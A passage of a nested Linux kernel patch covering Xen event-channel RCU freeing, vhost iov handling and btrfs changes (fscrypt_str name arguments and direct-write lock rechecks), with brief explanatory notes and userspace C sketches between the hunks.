+@@ -935,7 +933,6 @@ int target_for_each_device(int (*fn)(struct se_device *dev, void *data),
+ 	mutex_lock(&device_mutex);
+ 	ret = idr_for_each(&devices_idr, target_devices_idr_iter, &iter);
+ 	mutex_unlock(&device_mutex);
+-	config_item_put(iter.prev_item);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 33eb941fcf154..10bfc5f1c50d5 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -123,8 +123,18 @@ static inline ssize_t vringh_iov_xfer(struct vringh *vrh,
+ 		done += partlen;
+ 		len -= partlen;
+ 		ptr += partlen;
++		iov->consumed += partlen;
++		iov->iov[iov->i].iov_len -= partlen;
++		iov->iov[iov->i].iov_base += partlen;
+ 
+-		vringh_kiov_advance(iov, partlen);
++		if (!iov->iov[iov->i].iov_len) {
++			/* Fix up old iov element then increment. */
++			iov->iov[iov->i].iov_len = iov->consumed;
++			iov->iov[iov->i].iov_base -= iov->consumed;
++
++			iov->consumed = 0;
++			iov->i++;
++		}
+ 	}
+ 	return done;
+ }
+diff --git a/drivers/xen/events/events_base.c b/drivers/xen/events/events_base.c
+index c443f04aaad77..80b46de14f413 100644
+--- a/drivers/xen/events/events_base.c
++++ b/drivers/xen/events/events_base.c
+@@ -33,6 +33,7 @@
+ #include <linux/slab.h>
+ #include <linux/irqnr.h>
+ #include <linux/pci.h>
++#include <linux/rcupdate.h>
+ #include <linux/spinlock.h>
+ #include <linux/cpuhotplug.h>
+ #include <linux/atomic.h>
+@@ -96,6 +97,7 @@ enum xen_irq_type {
+ struct irq_info {
+ 	struct list_head list;
+ 	struct list_head eoi_list;
++	struct rcu_work rwork;
+ 	short refcnt;
+ 	u8 spurious_cnt;
+ 	u8 is_accounted;
+@@ -145,23 +147,13 @@ const struct evtchn_ops *evtchn_ops;
+  */
+ static DEFINE_MUTEX(irq_mapping_update_lock);
+ 
+-/*
+- * Lock protecting event handling loop against removing event channels.
+- * Adding of event channels is no issue as the associated IRQ becomes active
+- * only after everything is setup (before request_[threaded_]irq() the handler
+- * can't be entered for an event, as the event channel will be unmasked only
+- * then).
+- */
+-static DEFINE_RWLOCK(evtchn_rwlock);
+-
+ /*
+  * Lock hierarchy:
+  *
+  * irq_mapping_update_lock
+- *   evtchn_rwlock
+- *     IRQ-desc lock
+- *       percpu eoi_list_lock
+- *         irq_info->lock
++ *   IRQ-desc lock
++ *     percpu eoi_list_lock
++ *       irq_info->lock
+  */
+ 
+ static LIST_HEAD(xen_irq_list_head);
+@@ -305,6 +297,22 @@ static void channels_on_cpu_inc(struct irq_info *info)
+ 	info->is_accounted = 1;
+ }
+ 
++static void delayed_free_irq(struct work_struct *work)
++{
++	struct irq_info *info = container_of(to_rcu_work(work), struct irq_info,
++					     rwork);
++	unsigned int irq = info->irq;
++
++	/* Remove the info pointer only now, with no potential users left. */
++	set_info_for_irq(irq, NULL);
++
++	kfree(info);
++
++	/* Legacy IRQ descriptors are managed by the arch. */
++	if (irq >= nr_legacy_irqs())
++		irq_free_desc(irq);
++}
++
+ /* Constructors for packed IRQ information. */
+ static int xen_irq_info_common_setup(struct irq_info *info,
+ 				     unsigned irq,
+@@ -667,33 +675,36 @@ static void xen_irq_lateeoi_worker(struct work_struct *work)
+ 
+ 	eoi = container_of(to_delayed_work(work), struct lateeoi_work, delayed);
+ 
+-	read_lock_irqsave(&evtchn_rwlock, flags);
++	rcu_read_lock();
+ 
+ 	while (true) {
+-		spin_lock(&eoi->eoi_list_lock);
++		spin_lock_irqsave(&eoi->eoi_list_lock, flags);
+ 
+ 		info = list_first_entry_or_null(&eoi->eoi_list, struct irq_info,
+ 						eoi_list);
+ 
+-		if (info == NULL || now < info->eoi_time) {
+-			spin_unlock(&eoi->eoi_list_lock);
++		if (info == NULL)
++			break;
++
++		if (now < info->eoi_time) {
++			mod_delayed_work_on(info->eoi_cpu, system_wq,
++					    &eoi->delayed,
++					    info->eoi_time - now);
+ 			break;
+ 		}
+ 
+ 		list_del_init(&info->eoi_list);
+ 
+-		spin_unlock(&eoi->eoi_list_lock);
++		spin_unlock_irqrestore(&eoi->eoi_list_lock, flags);
+ 
+ 		info->eoi_time = 0;
+ 
+ 		xen_irq_lateeoi_locked(info, false);
+ 	}
+ 
+-	if (info)
+-		mod_delayed_work_on(info->eoi_cpu, system_wq,
+-				    &eoi->delayed, info->eoi_time - now);
++	spin_unlock_irqrestore(&eoi->eoi_list_lock, flags);
+ 
+-	read_unlock_irqrestore(&evtchn_rwlock, flags);
++	rcu_read_unlock();
+ }
+ 
+ static void xen_cpu_init_eoi(unsigned int cpu)
+@@ -708,16 +719,15 @@ static void xen_cpu_init_eoi(unsigned int cpu)
+ void xen_irq_lateeoi(unsigned int irq, unsigned int eoi_flags)
+ {
+ 	struct irq_info *info;
+-	unsigned long flags;
+ 
+-	read_lock_irqsave(&evtchn_rwlock, flags);
++	rcu_read_lock();
+ 
+ 	info = info_for_irq(irq);
+ 
+ 	if (info)
+ 		xen_irq_lateeoi_locked(info, eoi_flags & XEN_EOI_FLAG_SPURIOUS);
+ 
+-	read_unlock_irqrestore(&evtchn_rwlock, flags);
++	rcu_read_unlock();
+ }
+ EXPORT_SYMBOL_GPL(xen_irq_lateeoi);
+ 
+@@ -731,6 +741,7 @@ static void xen_irq_init(unsigned irq)
+ 
+ 	info->type = IRQT_UNBOUND;
+ 	info->refcnt = -1;
++	INIT_RCU_WORK(&info->rwork, delayed_free_irq);
+ 
+ 	set_info_for_irq(irq, info);
+ 	/*
+@@ -788,31 +799,18 @@ static int __must_check xen_allocate_irq_gsi(unsigned gsi)
+ static void xen_free_irq(unsigned irq)
+ {
+ 	struct irq_info *info = info_for_irq(irq);
+-	unsigned long flags;
+ 
+ 	if (WARN_ON(!info))
+ 		return;
+ 
+-	write_lock_irqsave(&evtchn_rwlock, flags);
+-
+ 	if (!list_empty(&info->eoi_list))
+ 		lateeoi_list_del(info);
+ 
+ 	list_del(&info->list);
+ 
+-	set_info_for_irq(irq, NULL);
+-
+ 	WARN_ON(info->refcnt > 0);
+ 
+-	write_unlock_irqrestore(&evtchn_rwlock, flags);
+-
+-	kfree(info);
+-
+-	/* Legacy IRQ descriptors are managed by the arch. */
+-	if (irq < nr_legacy_irqs())
+-		return;
+-
+-	irq_free_desc(irq);
++	queue_rcu_work(system_wq, &info->rwork);
+ }
+ 
+ static void xen_evtchn_close(evtchn_port_t port)
+@@ -1716,7 +1714,14 @@ static void __xen_evtchn_do_upcall(void)
+ 	int cpu = smp_processor_id();
+ 	struct evtchn_loop_ctrl ctrl = { 0 };
+ 
+-	read_lock(&evtchn_rwlock);
++	/*
++	 * When closing an event channel the associated IRQ must not be freed
++	 * until all cpus have left the event handling loop. This is ensured
++	 * by taking the rcu_read_lock() while handling events, as freeing of
++	 * the IRQ is handled via queue_rcu_work() _after_ closing the event
++	 * channel.
++	 */
++	rcu_read_lock();
+ 
+ 	do {
+ 		vcpu_info->evtchn_upcall_pending = 0;
+@@ -1729,7 +1734,7 @@ static void __xen_evtchn_do_upcall(void)
+ 
+ 	} while (vcpu_info->evtchn_upcall_pending);
+ 
+-	read_unlock(&evtchn_rwlock);
++	rcu_read_unlock();
+ 
+ 	/*
+ 	 * Increment irq_epoch only now to defer EOIs only for
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 3bcef0c4d6fc4..27d06bb5e5c05 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -28,6 +28,7 @@
+ #include <linux/refcount.h>
+ #include <linux/crc32c.h>
+ #include <linux/iomap.h>
++#include <linux/fscrypt.h>
+ #include "extent-io-tree.h"
+ #include "extent_io.h"
+ #include "extent_map.h"
+@@ -3238,11 +3239,11 @@ static inline void btrfs_clear_sb_rdonly(struct super_block *sb)
+ 
+ /* root-item.c */
+ int btrfs_add_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 sequence, const char *name,
+-		       int name_len);
++		       u64 ref_id, u64 dirid, u64 sequence,
++		       const struct fscrypt_str *name);
+ int btrfs_del_root_ref(struct btrfs_trans_handle *trans, u64 root_id,
+-		       u64 ref_id, u64 dirid, u64 *sequence, const char *name,
+-		       int name_len);
++		       u64 ref_id, u64 dirid, u64 *sequence,
++		       const struct fscrypt_str *name);
+ int btrfs_del_root(struct btrfs_trans_handle *trans,
+ 		   const struct btrfs_key *key);
+ int btrfs_insert_root(struct btrfs_trans_handle *trans, struct btrfs_root *root,
+@@ -3271,25 +3272,23 @@ int btrfs_uuid_tree_iterate(struct btrfs_fs_info *fs_info);
+ 
+ /* dir-item.c */
+ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+-			  const char *name, int name_len);
+-int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+-			  int name_len, struct btrfs_inode *dir,
++			  const struct fscrypt_str *name);
++int btrfs_insert_dir_item(struct btrfs_trans_handle *trans,
++			  const struct fscrypt_str *name, struct btrfs_inode *dir,
+ 			  struct btrfs_key *location, u8 type, u64 index);
+ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 					     struct btrfs_root *root,
+ 					     struct btrfs_path *path, u64 dir,
+-					     const char *name, int name_len,
+-					     int mod);
++					     const struct fscrypt_str *name, int mod);
+ struct btrfs_dir_item *
+ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 			    struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dir,
+-			    u64 index, const char *name, int name_len,
+-			    int mod);
++			    u64 index, const struct fscrypt_str *name, int mod);
+ struct btrfs_dir_item *
+ btrfs_search_dir_index_item(struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dirid,
+-			    const char *name, int name_len);
++			    const struct fscrypt_str *name);
+ int btrfs_delete_one_dir_name(struct btrfs_trans_handle *trans,
+ 			      struct btrfs_root *root,
+ 			      struct btrfs_path *path,
+@@ -3370,10 +3369,10 @@ struct inode *btrfs_lookup_dentry(struct inode *dir, struct dentry *dentry);
+ int btrfs_set_inode_index(struct btrfs_inode *dir, u64 *index);
+ int btrfs_unlink_inode(struct btrfs_trans_handle *trans,
+ 		       struct btrfs_inode *dir, struct btrfs_inode *inode,
+-		       const char *name, int name_len);
++		       const struct fscrypt_str *name);
+ int btrfs_add_link(struct btrfs_trans_handle *trans,
+ 		   struct btrfs_inode *parent_inode, struct btrfs_inode *inode,
+-		   const char *name, int name_len, int add_backref, u64 index);
++		   const struct fscrypt_str *name, int add_backref, u64 index);
+ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry);
+ int btrfs_truncate_block(struct btrfs_inode *inode, loff_t from, loff_t len,
+ 			 int front);
+@@ -3398,6 +3397,7 @@ struct btrfs_new_inode_args {
+ 	 */
+ 	struct posix_acl *default_acl;
+ 	struct posix_acl *acl;
++	struct fscrypt_name fname;
+ };
+ int btrfs_new_inode_prepare(struct btrfs_new_inode_args *args,
+ 			    unsigned int *trans_num_items);
+diff --git a/fs/btrfs/dir-item.c b/fs/btrfs/dir-item.c
+index 72fb2c518a2b4..fdab48c1abb8a 100644
+--- a/fs/btrfs/dir-item.c
++++ b/fs/btrfs/dir-item.c
+@@ -103,8 +103,8 @@ int btrfs_insert_xattr_item(struct btrfs_trans_handle *trans,
+  * to use for the second index (if one is created).
+  * Will return 0 or -ENOMEM
+  */
+-int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+-			  int name_len, struct btrfs_inode *dir,
++int btrfs_insert_dir_item(struct btrfs_trans_handle *trans,
++			  const struct fscrypt_str *name, struct btrfs_inode *dir,
+ 			  struct btrfs_key *location, u8 type, u64 index)
+ {
+ 	int ret = 0;
+@@ -120,7 +120,7 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 
+ 	key.objectid = btrfs_ino(dir);
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -128,9 +128,9 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 
+ 	btrfs_cpu_key_to_disk(&disk_key, location);
+ 
+-	data_size = sizeof(*dir_item) + name_len;
++	data_size = sizeof(*dir_item) + name->len;
+ 	dir_item = insert_with_overflow(trans, root, path, &key, data_size,
+-					name, name_len);
++					name->name, name->len);
+ 	if (IS_ERR(dir_item)) {
+ 		ret = PTR_ERR(dir_item);
+ 		if (ret == -EEXIST)
+@@ -142,11 +142,11 @@ int btrfs_insert_dir_item(struct btrfs_trans_handle *trans, const char *name,
+ 	btrfs_set_dir_item_key(leaf, dir_item, &disk_key);
+ 	btrfs_set_dir_type(leaf, dir_item, type);
+ 	btrfs_set_dir_data_len(leaf, dir_item, 0);
+-	btrfs_set_dir_name_len(leaf, dir_item, name_len);
++	btrfs_set_dir_name_len(leaf, dir_item, name->len);
+ 	btrfs_set_dir_transid(leaf, dir_item, trans->transid);
+ 	name_ptr = (unsigned long)(dir_item + 1);
+ 
+-	write_extent_buffer(leaf, name, name_ptr, name_len);
++	write_extent_buffer(leaf, name->name, name_ptr, name->len);
+ 	btrfs_mark_buffer_dirty(leaf);
+ 
+ second_insert:
+@@ -157,7 +157,7 @@ second_insert:
+ 	}
+ 	btrfs_release_path(path);
+ 
+-	ret2 = btrfs_insert_delayed_dir_index(trans, name, name_len, dir,
++	ret2 = btrfs_insert_delayed_dir_index(trans, name->name, name->len, dir,
+ 					      &disk_key, type, index);
+ out_free:
+ 	btrfs_free_path(path);
+@@ -206,7 +206,7 @@ static struct btrfs_dir_item *btrfs_lookup_match_dir(
+ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 					     struct btrfs_root *root,
+ 					     struct btrfs_path *path, u64 dir,
+-					     const char *name, int name_len,
++					     const struct fscrypt_str *name,
+ 					     int mod)
+ {
+ 	struct btrfs_key key;
+@@ -214,9 +214,10 @@ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = dir;
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+-	di = btrfs_lookup_match_dir(trans, root, path, &key, name, name_len, mod);
++	di = btrfs_lookup_match_dir(trans, root, path, &key, name->name,
++				    name->len, mod);
+ 	if (IS_ERR(di) && PTR_ERR(di) == -ENOENT)
+ 		return NULL;
+ 
+@@ -224,7 +225,7 @@ struct btrfs_dir_item *btrfs_lookup_dir_item(struct btrfs_trans_handle *trans,
+ }
+ 
+ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+-				   const char *name, int name_len)
++				   const struct fscrypt_str *name)
+ {
+ 	int ret;
+ 	struct btrfs_key key;
+@@ -240,9 +241,10 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+ 
+ 	key.objectid = dir;
+ 	key.type = BTRFS_DIR_ITEM_KEY;
+-	key.offset = btrfs_name_hash(name, name_len);
++	key.offset = btrfs_name_hash(name->name, name->len);
+ 
+-	di = btrfs_lookup_match_dir(NULL, root, path, &key, name, name_len, 0);
++	di = btrfs_lookup_match_dir(NULL, root, path, &key, name->name,
++				    name->len, 0);
+ 	if (IS_ERR(di)) {
+ 		ret = PTR_ERR(di);
+ 		/* Nothing found, we're safe */
+@@ -262,11 +264,8 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir,
+ 		goto out;
+ 	}
+ 
+-	/*
+-	 * see if there is room in the item to insert this
+-	 * name
+-	 */
+-	data_size = sizeof(*di) + name_len;
++	/* See if there is room in the item to insert this name. */
++	data_size = sizeof(*di) + name->len;
+ 	leaf = path->nodes[0];
+ 	slot = path->slots[0];
+ 	if (data_size + btrfs_item_size(leaf, slot) +
+@@ -303,8 +302,7 @@ struct btrfs_dir_item *
+ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 			    struct btrfs_root *root,
+ 			    struct btrfs_path *path, u64 dir,
+-			    u64 index, const char *name, int name_len,
+-			    int mod)
++			    u64 index, const struct fscrypt_str *name, int mod)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+@@ -313,7 +311,8 @@ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ 	key.type = BTRFS_DIR_INDEX_KEY;
+ 	key.offset = index;
+ 
+-	di = btrfs_lookup_match_dir(trans, root, path, &key, name, name_len, mod);
++	di = btrfs_lookup_match_dir(trans, root, path, &key, name->name,
++				    name->len, mod);
+ 	if (di == ERR_PTR(-ENOENT))
+ 		return NULL;
+ 
+@@ -321,9 +320,8 @@ btrfs_lookup_dir_index_item(struct btrfs_trans_handle *trans,
+ }
+ 
+ struct btrfs_dir_item *
+-btrfs_search_dir_index_item(struct btrfs_root *root,
+-			    struct btrfs_path *path, u64 dirid,
+-			    const char *name, int name_len)
++btrfs_search_dir_index_item(struct btrfs_root *root, struct btrfs_path *path,
++			    u64 dirid, const struct fscrypt_str *name)
+ {
+ 	struct btrfs_dir_item *di;
+ 	struct btrfs_key key;
+@@ -338,7 +336,7 @@ btrfs_search_dir_index_item(struct btrfs_root *root,
+ 			break;
+ 
+ 		di = btrfs_match_dir_item_name(root->fs_info, path,
+-					       name, name_len);
++					       name->name, name->len);
+ 		if (di)
+ 			return di;
+ 	}
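
All of the dir-item.c hunks above apply one mechanical conversion: each
(const char *name, int name_len) pair becomes a single
const struct fscrypt_str *name, and the helpers read name->name and
name->len. A minimal userspace sketch of the idea follows; the struct and
FSTR_INIT() below are simplified stand-ins for the definitions in
include/linux/fscrypt.h, and the hash is a toy placeholder for
btrfs_name_hash():

#include <stdio.h>

/* Simplified stand-ins for the kernel's struct fscrypt_str and the
 * FSTR_INIT() initializer from include/linux/fscrypt.h. */
struct fscrypt_str {
	char *name;
	unsigned int len;
};
#define FSTR_INIT(n, l)	{ .name = (n), .len = (l) }

/* Old style: name and length travel as two loose parameters. */
static unsigned int name_hash_old(const char *name, int name_len)
{
	unsigned int h = 0;

	for (int i = 0; i < name_len; i++)
		h = h * 31 + (unsigned char)name[i];
	return h;
}

/* New style: one pointer carries both fields, so callers read
 * name->name and name->len and the pair can never drift apart. */
static unsigned int name_hash_new(const struct fscrypt_str *name)
{
	return name_hash_old(name->name, name->len);
}

int main(void)
{
	struct fscrypt_str name = FSTR_INIT((char *)"default", 7);

	printf("old=%u new=%u\n",
	       name_hash_old("default", 7), name_hash_new(&name));
	return 0;
}
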
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 77202addead83..0a46fff3dd067 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1458,8 +1458,13 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	if (iocb->ki_flags & IOCB_NOWAIT)
+ 		ilock_flags |= BTRFS_ILOCK_TRY;
+ 
+-	/* If the write DIO is within EOF, use a shared lock */
+-	if (iocb->ki_pos + iov_iter_count(from) <= i_size_read(inode))
++	/*
++	 * If the write DIO is within EOF, use a shared lock, and also only
++	 * if security bits will likely not be dropped by file_remove_privs()
++	 * called from btrfs_write_check(). Either condition will need to be
++	 * rechecked after the lock is acquired.
++	 */
++	if (iocb->ki_pos + iov_iter_count(from) <= i_size_read(inode) && IS_NOSEC(inode))
+ 		ilock_flags |= BTRFS_ILOCK_SHARED;
+ 
+ relock:
+@@ -1467,6 +1472,13 @@ relock:
+ 	if (err < 0)
+ 		return err;
+ 
++	/* Shared lock cannot be used with security bits set. */
++	if ((ilock_flags & BTRFS_ILOCK_SHARED) && !IS_NOSEC(inode)) {
++		btrfs_inode_unlock(inode, ilock_flags);
++		ilock_flags &= ~BTRFS_ILOCK_SHARED;
++		goto relock;
++	}
++
+ 	err = generic_write_checks(iocb, from);
+ 	if (err <= 0) {
+ 		btrfs_inode_unlock(inode, ilock_flags);
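
The file.c hunk is an optimistic locking pattern: pre-check IS_NOSEC()
without the lock, take the cheaper shared lock when it holds, then recheck
once the lock is owned and retry with the exclusive lock if the inode
gained security bits in the meantime. A hedged pthread sketch of the same
check/lock/recheck loop; the rwlock and the nosec flag are illustrative
stand-ins, not the btrfs locking API:

#include <pthread.h>
#include <stdbool.h>
#include <stdio.h>

static pthread_rwlock_t ilock = PTHREAD_RWLOCK_INITIALIZER;
static volatile bool nosec = true;	/* stand-in for IS_NOSEC(inode) */

static void locked_write(void)
{
	bool shared = nosec;	/* optimistic pre-check, done unlocked */

relock:
	if (shared)
		pthread_rwlock_rdlock(&ilock);
	else
		pthread_rwlock_wrlock(&ilock);

	/* The predicate may have changed before we got the lock. */
	if (shared && !nosec) {
		pthread_rwlock_unlock(&ilock);
		shared = false;		/* fall back to the exclusive lock */
		goto relock;
	}

	printf("writing under a %s lock\n", shared ? "shared" : "exclusive");
	pthread_rwlock_unlock(&ilock);
}

int main(void)
{
	locked_write();
	nosec = false;
	locked_write();
	return 0;
}
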
+diff --git a/fs/btrfs/inode-item.c b/fs/btrfs/inode-item.c
+index 0eeb5ea878948..5add022d3534f 100644
+--- a/fs/btrfs/inode-item.c
++++ b/fs/btrfs/inode-item.c
+@@ -10,8 +10,8 @@
+ #include "print-tree.h"
+ 
+ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+-						   int slot, const char *name,
+-						   int name_len)
++						   int slot,
++						   const struct fscrypt_str *name)
+ {
+ 	struct btrfs_inode_ref *ref;
+ 	unsigned long ptr;
+@@ -27,9 +27,10 @@ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+ 		len = btrfs_inode_ref_name_len(leaf, ref);
+ 		name_ptr = (unsigned long)(ref + 1);
+ 		cur_offset += len + sizeof(*ref);
+-		if (len != name_len)
++		if (len != name->len)
+ 			continue;
+-		if (memcmp_extent_buffer(leaf, name, name_ptr, name_len) == 0)
++		if (memcmp_extent_buffer(leaf, name->name, name_ptr,
++					 name->len) == 0)
+ 			return ref;
+ 	}
+ 	return NULL;
+@@ -37,7 +38,7 @@ struct btrfs_inode_ref *btrfs_find_name_in_backref(struct extent_buffer *leaf,
+ 
+ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		struct extent_buffer *leaf, int slot, u64 ref_objectid,
+-		const char *name, int name_len)
++		const struct fscrypt_str *name)
+ {
+ 	struct btrfs_inode_extref *extref;
+ 	unsigned long ptr;
+@@ -60,9 +61,10 @@ struct btrfs_inode_extref *btrfs_find_name_in_ext_backref(
+ 		name_ptr = (unsigned long)(&extref->name);
+ 		ref_name_len = btrfs_inode_extref_name_len(leaf, extref);
+ 
+-		if (ref_name_len == name_len &&
++		if (ref_name_len == name->len &&
+ 		    btrfs_inode_extref_parent(leaf, extref) == ref_objectid &&
+-		    (memcmp_extent_buffer(leaf, name, name_ptr, name_len) == 0))
++		    (memcmp_extent_buffer(leaf, name->name, name_ptr,
++					  name->len) == 0))
+ 			return extref;
+ 
+ 		cur_offset += ref_name_len + sizeof(*extref);
+@@ -75,7 +77,7 @@ struct btrfs_inode_extref *
+ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 			  struct btrfs_root *root,
+ 			  struct btrfs_path *path,
+-			  const char *name, int name_len,
++			  const struct fscrypt_str *name,
+ 			  u64 inode_objectid, u64 ref_objectid, int ins_len,
+ 			  int cow)
+ {
+@@ -84,7 +86,7 @@ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	ret = btrfs_search_slot(trans, root, &key, path, ins_len, cow);
+ 	if (ret < 0)
+@@ -92,13 +94,13 @@ btrfs_lookup_inode_extref(struct btrfs_trans_handle *trans,
+ 	if (ret > 0)
+ 		return NULL;
+ 	return btrfs_find_name_in_ext_backref(path->nodes[0], path->slots[0],
+-					      ref_objectid, name, name_len);
++					      ref_objectid, name);
+ 
+ }
+ 
+ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 				  struct btrfs_root *root,
+-				  const char *name, int name_len,
++				  const struct fscrypt_str *name,
+ 				  u64 inode_objectid, u64 ref_objectid,
+ 				  u64 *index)
+ {
+@@ -107,14 +109,14 @@ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 	struct btrfs_inode_extref *extref;
+ 	struct extent_buffer *leaf;
+ 	int ret;
+-	int del_len = name_len + sizeof(*extref);
++	int del_len = name->len + sizeof(*extref);
+ 	unsigned long ptr;
+ 	unsigned long item_start;
+ 	u32 item_size;
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -132,7 +134,7 @@ static int btrfs_del_inode_extref(struct btrfs_trans_handle *trans,
+ 	 * readonly.
+ 	 */
+ 	extref = btrfs_find_name_in_ext_backref(path->nodes[0], path->slots[0],
+-						ref_objectid, name, name_len);
++						ref_objectid, name);
+ 	if (!extref) {
+ 		btrfs_handle_fs_error(root->fs_info, -ENOENT, NULL);
+ 		ret = -EROFS;
+@@ -168,8 +170,7 @@ out:
+ }
+ 
+ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+-			struct btrfs_root *root,
+-			const char *name, int name_len,
++			struct btrfs_root *root, const struct fscrypt_str *name,
+ 			u64 inode_objectid, u64 ref_objectid, u64 *index)
+ {
+ 	struct btrfs_path *path;
+@@ -182,7 +183,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 	u32 sub_item_len;
+ 	int ret;
+ 	int search_ext_refs = 0;
+-	int del_len = name_len + sizeof(*ref);
++	int del_len = name->len + sizeof(*ref);
+ 
+ 	key.objectid = inode_objectid;
+ 	key.offset = ref_objectid;
+@@ -201,8 +202,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 
+-	ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0], name,
+-					 name_len);
++	ref = btrfs_find_name_in_backref(path->nodes[0], path->slots[0], name);
+ 	if (!ref) {
+ 		ret = -ENOENT;
+ 		search_ext_refs = 1;
+@@ -219,7 +219,7 @@ int btrfs_del_inode_ref(struct btrfs_trans_handle *trans,
+ 		goto out;
+ 	}
+ 	ptr = (unsigned long)ref;
+-	sub_item_len = name_len + sizeof(*ref);
++	sub_item_len = name->len + sizeof(*ref);
+ 	item_start = btrfs_item_ptr_offset(leaf, path->slots[0]);
+ 	memmove_extent_buffer(leaf, ptr, ptr + sub_item_len,
+ 			      item_size - (ptr + sub_item_len - item_start));
+@@ -233,7 +233,7 @@ out:
+ 		 * name in our ref array. Find and remove the extended
+ 		 * inode ref then.
+ 		 */
+-		return btrfs_del_inode_extref(trans, root, name, name_len,
++		return btrfs_del_inode_extref(trans, root, name,
+ 					      inode_objectid, ref_objectid, index);
+ 	}
+ 
+@@ -247,12 +247,13 @@ out:
+  */
+ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 				     struct btrfs_root *root,
+-				     const char *name, int name_len,
+-				     u64 inode_objectid, u64 ref_objectid, u64 index)
++				     const struct fscrypt_str *name,
++				     u64 inode_objectid, u64 ref_objectid,
++				     u64 index)
+ {
+ 	struct btrfs_inode_extref *extref;
+ 	int ret;
+-	int ins_len = name_len + sizeof(*extref);
++	int ins_len = name->len + sizeof(*extref);
+ 	unsigned long ptr;
+ 	struct btrfs_path *path;
+ 	struct btrfs_key key;
+@@ -260,7 +261,7 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 
+ 	key.objectid = inode_objectid;
+ 	key.type = BTRFS_INODE_EXTREF_KEY;
+-	key.offset = btrfs_extref_hash(ref_objectid, name, name_len);
++	key.offset = btrfs_extref_hash(ref_objectid, name->name, name->len);
+ 
+ 	path = btrfs_alloc_path();
+ 	if (!path)
+@@ -272,7 +273,7 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 		if (btrfs_find_name_in_ext_backref(path->nodes[0],
+ 						   path->slots[0],
+ 						   ref_objectid,
+-						   name, name_len))
++						   name))
+ 			goto out;
+ 
+ 		btrfs_extend_item(path, ins_len);
+@@ -286,12 +287,12 @@ static int btrfs_insert_inode_extref(struct btrfs_trans_handle *trans,
+ 	ptr += btrfs_item_size(leaf, path->slots[0]) - ins_len;
+ 	extref = (struct btrfs_inode_extref *)ptr;
+ 
+-	btrfs_set_inode_extref_name_len(path->nodes[0], extref, name_len);
++	btrfs_set_inode_extref_name_len(path->nodes[0], extref, name->len);
+ 	btrfs_set_inode_extref_index(path->nodes[0], extref, index);
+ 	btrfs_set_inode_extref_parent(path->nodes[0], extref, ref_objectid);
+ 
+ 	ptr = (unsigned long)&extref->name;
+-	write_extent_buffer(path->nodes[0], name, ptr, name_len);
++	write_extent_buffer(path->nodes[0], name->name, ptr, name->len);
+ 	btrfs_mark_buffer_dirty(path->nodes[0]);
+ 
+ out:
+@@ -301,8 +302,7 @@ out:
+ 
+ /* Will return 0, -ENOMEM, -EMLINK, or -EEXIST or anything from the CoW path */
+ int btrfs_insert_inode_ref(struct btrfs_trans_handle *trans,
+-			   struct btrfs_root *root,
